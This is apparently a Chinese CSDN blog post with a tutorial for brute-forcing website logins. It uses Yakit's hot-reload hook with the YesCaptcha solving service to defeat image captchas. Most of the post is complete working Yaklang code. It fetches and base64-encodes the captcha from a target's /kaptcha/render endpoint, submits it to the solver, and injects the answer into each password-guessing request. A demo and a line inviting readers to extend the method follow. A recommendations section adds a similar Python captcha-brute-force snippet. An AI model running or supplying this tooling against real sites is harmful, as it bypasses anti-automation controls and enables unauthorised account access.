通过yakit热加载与yescaptcha平台实现识别验证码爆破登录 (一)

于 2025-05-03 22:46:17 发布
阅读量465 收藏 5
点赞数 12
分类专栏: 验证码 文章标签: 网络安全 验证码绕过 口令爆破 yakit 验证码识别
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35561447/article/details/147688232
版权

免责声明

本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。

什么是yakit的热加载

广义上来说,热加载是一种允许在不停止或重启应用程序的情况下,动态加载或更新特定组件或模块的功能。这种技术常用于开发过程中,提高开发效率和用户体验。

具体的解释访问https://www.yaklang.comproducts/Web

yescaptcha平台是做什么的

YesCaptcha‌是一个提供验证码识别服务的平台,主要支持reCAPTCHA、HCaptcha、funcaptcha以及英文数字验证码等类型的验证码识别。用户可以通过该平台解决各种验证码问题,确保自动化脚本或机器人能够顺利通过验证,从而在开发、测试和自动化任务中发挥作用‌。官网http://www.yescaptcha.com

如何通过yakit热加载与yescaptcha平台实现识别验证码爆破登录

技术要求:

掌握yakit基础语法学习

 https://www.yaklang.com/docs/intro

图片

了解yescaptcha的开发者文档 

https://yescaptcha.atlassian.net/wiki/spaces/YESCAPTCHA/pages/63897603/YesCaptcha+API

图片

图片验证码工作原理

通过固定接口生成 通过yakit的抓包可以看出 也可以手动刷新查看

图片

实现方法

1.首先注册yescaptcha账户充值点数 各种验证码的价格 然后复制主页的key

图片

图片

图片

2.利用官方的文档编写识别函数 注:要求填入的是base64

图片

代码实现

由于不知道是我yakit的问题还是什么 我返回的json格式会多一个括号 添加了去一次括号的功能 

var image_txt = func(data) { 
    rsp, req = poc.HTTP(f`POST /createTask HTTP/1.1
Host: cn.yescaptcha.com
Content-Type: application/json

{
    "clientKey":"你的key",
    "task": {
        "type":"ImageToTextTaskTest",
        "body":"${data}"
    }
}`)~
    rspIns = poc.ParseBytesToHTTPResponse(rsp)~
    data = str.Replace(str.Replace(string(rspIns.Body), "{{", "{",1),"}}", "}",1)
    code = json.Find(data, "$.solution.text")
    return code
}
img = ""
print(image_txt(img))

图片

接下来插入数据 已经如图为例 成功识别正确的结果

图片

图片

3.了解验证码的格式和工作原理 以该cms为例 抓包得到验证码返回为非base64格式 所以在获取验证码返回包上要进行base64编码处理。

图片

代码实现

var jiema_http = func(input){
    rsp, req = poc.HTTP(f`GET /kaptcha/render HTTP/1.1
Host: xxxxxx
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: xxxxxxx
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
`)~
    rspIns = poc.ParseBytesToHTTPResponse(rsp)~
    data = codec.EncodeBase64(rspIns.Body)
    return data
}
print(jiema_http(1))

注意:此处的数据包中的参数建议复制全部 部分验证码验证cookie等参数

图片

图片

4.获取与识别联动

图片

5.融入热加载

在上代码的基础上添加占位符代码插入热加载中保存 并且设置发包线程为1

图片

图片

全部代码//解码-不定长度图片

//解码-不定长度图片
var image_txt = func(data) { 
    rsp, req = poc.HTTP(f`POST /createTask HTTP/1.1
Host: cn.yescaptcha.com
Content-Type: application/json
{
    "clientKey":"你的key",
    "task": {
        "type":"ImageToTextTaskTest",
        "body":"${data}"
    }
}`)~
    rspIns = poc.ParseBytesToHTTPResponse(rsp)~
    data = str.Replace(str.Replace(string(rspIns.Body), "{{", "{",1),"}}", "}",1)
    code = json.Find(data, "$.solution.text")
    return code
}

var jiema_http = func(input){
    rsp, req = poc.HTTP(f`GET /kaptcha/render HTTP/1.1
Host: xxxxxx
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: xxxxxx
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
`)~
    rspIns = poc.ParseBytesToHTTPResponse(rsp)~
    data = codec.EncodeBase64(rspIns.Body)
    return data
}
beforeRequest = func(req){
    code = image_txt(jiema_http(1))
    req = re.ReplaceAll(req, `__verify__`, code)
    return []byte(req)
}

爆破演示

验证码正确则返回erro 错误返回的是验证码错误

图片

图片

最后

本文讲了如何利用热加载进行用户账户密码爆破,看完的师傅们能举一反三去进行更多的使用。

WEB攻防-&图片验证码识别&登录爆破&BurpCrypto&js调试前端加密爆破
m0_70535581的博客
07-18 749
WEB攻防-&图片验证码识别&登录爆破&BurpCrypto&js调试前端加密爆破
Yakit热加载配合js逆向的进阶用法
m0_73783299的博客
02-05 1609
我们可以分析JavaScript代码来破解sign字段的生成逻辑,然后自行生成有效的sign值进行爆破。可以知道sign的加密方式就是对时间戳、验证码、账号和md5后的密码组成的字符串进行md5加密。这次返回的结果是“用户密码有误”而不是“验签失败”,说明我们已经成功逆向了,可以直接进行爆破。逐步执行代码,观察到执行该函数后生成了 sign 值,确认这个函数就是用来生成签名的函数。函数中有t、b等参数,还返回了个p()(e),在控制台打印下,看看它们具体是什么。
pkav验证码爆破工具
05-14
pkav验证码爆破工具
验证码识别 登陆 爆破 暴力破解 工具F-Login F-Verify
04-19
验证码识别 登陆 爆破 暴力破解 工具F-Login F-Verify,国内安全团队开发的验证码识别工具,能够识别验证码实现密码爆破
密码爆破---绕过验证码进行登录爆破
04-14
密码爆破---绕过验证码进行登录爆破 ...绕过验证码进行登录爆破种复杂的技术,需要结合多种技术和工具来实现。我们的实现原理基于 muggle_ocr 库,使用 OCR 技术来识别验证码,并将其转换为文本。
口令爆破(图片验证码爆破工具)
03-01
用于带有图片验证码口令爆破
文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8686
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行个简单的行业前景分析。 网络安全行业市场发展情况 网络时代生活越来越离不开网络,此同时发生的网络安全攻击事件、非法入侵等等系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
改进A星算法:实现多个机器人AGV小车路径规划动态避障的完整Matlab代码
05-05
内容概要:本文介绍了如何利用改进的A星算法实现多个机器人和AGV小车的路径规划动态避障。主要内容分为四个部分:首先是环境创建,通过矩阵表示地图并在特定位置设定障碍物;其次是机器人(小车)位置设置,指定起始点和目标点;然后重点讲解了改进后的A星算法,在原有基础上增加了对其他机器人位置和路径的考量,以避免碰撞;最后展示了路径规划的具体步骤以及结果显示方式。此外,文中还提供了详细的代码片段,涵盖从环境构建到路径规划的全过程,并讨论了些优化技巧如路径冲突检测、动态权重调整等。 适合人群:从事机器人导航系统开发的研究人员和技术爱好者,特别是那些希望深入了解路径规划算法及其应用的人群。 使用场景及目标:适用于需要解决多机器人协作任务的企业和个人开发者,旨在提高自动化设备在复杂环境中的自主行动能力,确保高效且安全地完成预定任务。 其他说明:作者强调了该方法对于仓储物流等行业的重要性,并指出传统A星算法在此类应用场景中存在的局限性。同时提醒读者关注Matlab版本兼容性和实际部署时可能遇到的问题。
【Windows系统管理】创建任务计划实现软件开机自启动:任务计划配置BAT脚本自动化方法详解
05-05
内容概要:本文档详细介绍了三种在Windows系统中创建任务计划以实现软件开机启动的方法。第种方法是通过任务计划创建,包括打开任务计划、设置常规参数、触发器和操作,最终实现软件在系统重启后自动启动;第二种方法是通过降低用户权限来避免软件启动时出现UAC权限询问弹窗,具体步骤为调整用户账户控制设置到最低级别;第三种方法是利用bat脚本创建任务计划,提供了详细的脚本代码,包含管理员权限检查、可配置变量设置、创建任务命令以及相关辅助命令,同时提醒用户注意安全软件可能对任务创建或执行的限制。 适合人群:适用于有定Windows操作系统使用经验,特别是需要设置软件开机自启动的计算机用户或IT运维人员。 使用场景及目标:①希望在系统重启后自动运行特定软件的用户;②希望通过脚本批量部署开机启动任务的企业IT管理员;③解决软件启动时UAC权限弹窗问题的用户。 阅读建议:对于想要深入了解任务计划创建机制和bat脚本编程的读者来说,建议仔细研究第三种方案中的脚本代码及其说明部分,并尝试在测试环境中进行实践操作。对于普通用户,则重点掌握前两种简单易行的方法即可。
COMSOL实现双孔单渗透瓦斯抽采:分析煤层内裂隙基质渗流及应力分布
05-05
内容概要:本文详细介绍了如何使用COMSOL软件构建并实现双孔单渗透瓦斯抽采模型,探讨了煤层内部基质和裂隙的应力分布渗透率之间的关系。文章首先解释了双孔单渗透模型的基础概念,即瓦斯在基质和裂隙中的流动特性。随后,逐步展示了如何在COMSOL环境中搭建几何模型、定义物理场以及设置材料属性,特别关注了裂隙和基质渗透率的定义及其随应力变化的影响。此外,文章还讨论了多物理场耦合的方法,如将固体力学地下水流模块相结合,以模拟应力对裂隙渗透率的影响。最后,通过对不同渗透率条件下瓦斯流速和压力分布的模拟,揭示了优化瓦斯抽采方案的关键因素。 适合人群:从事煤矿安全工程、瓦斯抽采研究的专业人士和技术人员。 使用场景及目标:适用于希望深入了解煤层内瓦斯流动机制的研究人员,旨在提高瓦斯抽采效率,确保煤矿生产的安全性和经济性。 其他说明:文中提供了详细的建模步骤和代码片段,帮助读者更好地理解和复现实验结果。同时,强调了模型验证和优化的重要性,提出了若干实用技巧以应对常见的建模挑战。
Rust高性能日志滚动:RollingFileAppender.pdf
05-05
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅使用。文档仅供学习参考,请勿用作商业用途。 Rust 以内存安全、零成本抽象和并发高效的特性,重塑编程体验。无需垃圾回收,却能通过所有权借用检查机制杜绝空指针、数据竞争等隐患。从底层系统开发到 Web 服务构建,从物联网设备到高性能区块链,它凭借出色的性能和可靠性,成为开发者的全能利器。拥抱 Rust,解锁高效、安全编程新境界!
敏矽微ME32G030系列 keil 扩展包
05-05
敏矽微ME32G030系列 keil 扩展包
西门子S7-200 Smart PLC台达MS300变频器及欧姆龙E5CC温控器通讯程序:昆仑通态触摸屏控制实现扩展模块SB CM01通讯的集成方案
最新发布
05-05
内容概要:本文详细介绍了如何使用西门子S7-200 Smart PLC台达MS300变频器和欧姆龙E5CC温控器进行Modbus RTU通讯的具体实现步骤。主要内容涵盖硬件连接、参数设置、PLC程序编写、触摸屏配置等方面。文中不仅提供了详细的参数配置指导,如波特率、数据格式等,还展示了具体的梯形图代码和注意事项,确保各个设备之间的稳定通讯。此外,还分享了些常见的调试问题及其解决方案。 适合人群:具备定PLC编程基础的技术人员,尤其是从事自动化控制系统集成工作的工程师。 使用场景及目标:适用于需要集成多种工业设备的自动化控制系统项目,帮助工程师快速掌握不同品牌设备间的通讯方法,提高系统集成效率,减少调试时间和成本。 其他说明:文中提到的所有设备均采用Modbus RTU协议进行通讯,硬件连接主要涉及RS485接口和以太网接口。对于初学者来说,建议先熟悉Modbus协议的基本概念和通讯机制,以便更好地理解和应用本文的内容。
Rust内存安全指针:NonNull优化技巧.pdf
05-05
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅使用。文档仅供学习参考,请勿用作商业用途。 Rust 以内存安全、零成本抽象和并发高效的特性,重塑编程体验。无需垃圾回收,却能通过所有权借用检查机制杜绝空指针、数据竞争等隐患。从底层系统开发到 Web 服务构建,从物联网设备到高性能区块链,它凭借出色的性能和可靠性,成为开发者的全能利器。拥抱 Rust,解锁高效、安全编程新境界!
大作业自媒体上传需要文档
05-05
大作业自媒体上传需要文档
基于id=0控制的电机定子参数辨识方法——通过递推最小二乘法对R, ψf, Ls的仿真研究
05-05
内容概要:本文详细介绍了基于id=0控制的电机参数辨识方法,主要采用递推最小二乘法(RLS)对电机定子电阻R、永磁磁链ψf及dq轴电感Ls进行在线辨识。文章首先阐述了id=0控制策略及其优势,接着展示了RLS算法的具体实现过程,包括参数初始化、增益矩阵计算、参数更新和协方差矩阵更新。文中还讨论了采样频率的选择、积分环节的优化以及噪声处理等问题,并通过仿真实验验证了该方法的有效性和稳定性。此外,作者分享了些实践经验,如针对不同厂家电机的适应性调整和在线参数校验技巧。 适合人群:从事电机控制及相关领域的研究人员和技术人员,尤其是对永磁同步电机参数辨识感兴趣的读者。 使用场景及目标:适用于需要精确辨识电机参数的场合,如高性能电机控制系统的设计优化。目标是帮助读者掌握RLS算法在电机参数辨识中的应用,提高电机控制系统的性能和可靠性。 其他说明:文章提供了详细的代码示例和仿真结果,便于读者理解和实践。同时强调了物理直觉在参数辨识中的重要性,指出理论模型实际情况可能存在差异,需灵活应对。
基于单片机的智能大棚浇花花盆设计:光照、温度和土壤湿度监测控制系统
05-05
内容概要:本文详细介绍了个基于单片机的智能大棚花盆浇花系统的硬件和软件设计方案。硬件方面,系统集成了单片机、光敏电阻、A/D模块PCF8591、DS18B20温度传感器、土壤湿度传感器、1602液晶显示屏、按键、高亮LED灯、补温灯、风扇、继电器和水泵等多种组件。软件部分采用C语言编写,实现了光照、温度和土壤湿度的检测控制。具体来说,通过光敏电阻和PCF8591进行光照检测补光控制;利用DS18B20进行温度检测,并根据温度范围控制补温灯和风扇;通过土壤湿度传感器和继电器控制水泵进行精准浇水。此外,还提供了按键设置阈值等功能,确保系统的灵活性和实用性。 适合人群:对嵌入式系统和智能农业感兴趣的电子爱好者、学生和初学者。 使用场景及目标:适用于家庭园艺、小型农场等场合,旨在提供种低成本、高效的自动化灌溉和环境控制系统,帮助用户更好地管理和维护植物生长环境。 其他说明:文中还提到了些常见的硬件注意事项和技术细节,如I2C通信、单总线协议、延时处理等,有助于读者理解和调试系统。
Rust跨语言异常传播:panic处理.pdf
05-05
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅使用。文档仅供学习参考,请勿用作商业用途。 Rust 以内存安全、零成本抽象和并发高效的特性,重塑编程体验。无需垃圾回收,却能通过所有权借用检查机制杜绝空指针、数据竞争等隐患。从底层系统开发到 Web 服务构建,从物联网设备到高性能区块链,它凭借出色的性能和可靠性,成为开发者的全能利器。拥抱 Rust,解锁高效、安全编程新境界!
离合器外圈钻孔专用机床的设计研究.pdf
05-05
离合器外圈钻孔专用机床的设计研究.pdf
yakit 验证码爆破
02-09
### 如何使用Yakit实现验证码爆破 验证码通常用于防止自动化工具的滥用,增加了安全性。然而,在某些安全测试场景下,可能需要模拟攻击来评估系统的脆弱性。对于这需求,Yakit提供了套机制来进行验证码爆破。 #### 客户端请求验证码验证码生成过程中,每当用户尝试访问特定的功能页面时,服务器就会创建个新的验证码实例,并将其存储以便后续验证用户的输入是否匹配[^1]。此时可以通过编写脚本来自动获取这些动态变化的验证码图像或文本形式的数据。 ```python import requests def fetch_captcha(): url = 'http://example.com/getCaptcha' response = requests.get(url) with open('captcha.png', 'wb') as f: f.write(response.content) fetch_captcha() ``` 此代码片段展示了如何通过Python中的`requests`库向目标网站发起GET请求并下载最新的验证码图片到本地磁盘上。 #### 处理接收到的验证码 旦获得了验证码资源之后,则需要利用OCR(光学字符识别)或其他机器学习模型对其进行解析处理得到预期的结果字符串。如果涉及到图形化的挑战响应问题(CAPTCHA),则还需要额外训练专门针对此类模式设计的人工智能算法以提高成功率。 对于简单的字母数字组合型验证码来说,可以直接调用第三方API服务完成这项工作;而对于更复杂的图案类CAPTCHA,则建议采用深度神经网络架构如CNNs进行特征提取分类预测操作。 #### 发送带有猜测值的新请求 最后步就是把经过上述两步处理后的结果提交给服务器进行校验。这同样依赖于HTTP POST方法携带相应的表单字段参数传递过去等待反馈信息确认成功否。 ```python data = { 'username': 'test_user', 'password': 'test_password', 'captcha_code': parsed_captcha_value # 前面步骤获得的内容 } response = session.post(login_url, data=data) if "Welcome" in response.text: print("Login successful!") else: print("Failed to login.") ``` 以上示例说明了整个流程中最为关键的部分是如何构造有效的POST请求体以及判断最终认证状态的方式之。 为了使这个过程更加高效可靠,可以考虑引入多线程或多进程编程技巧加快速度减少延迟时间影响整体性能表现[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值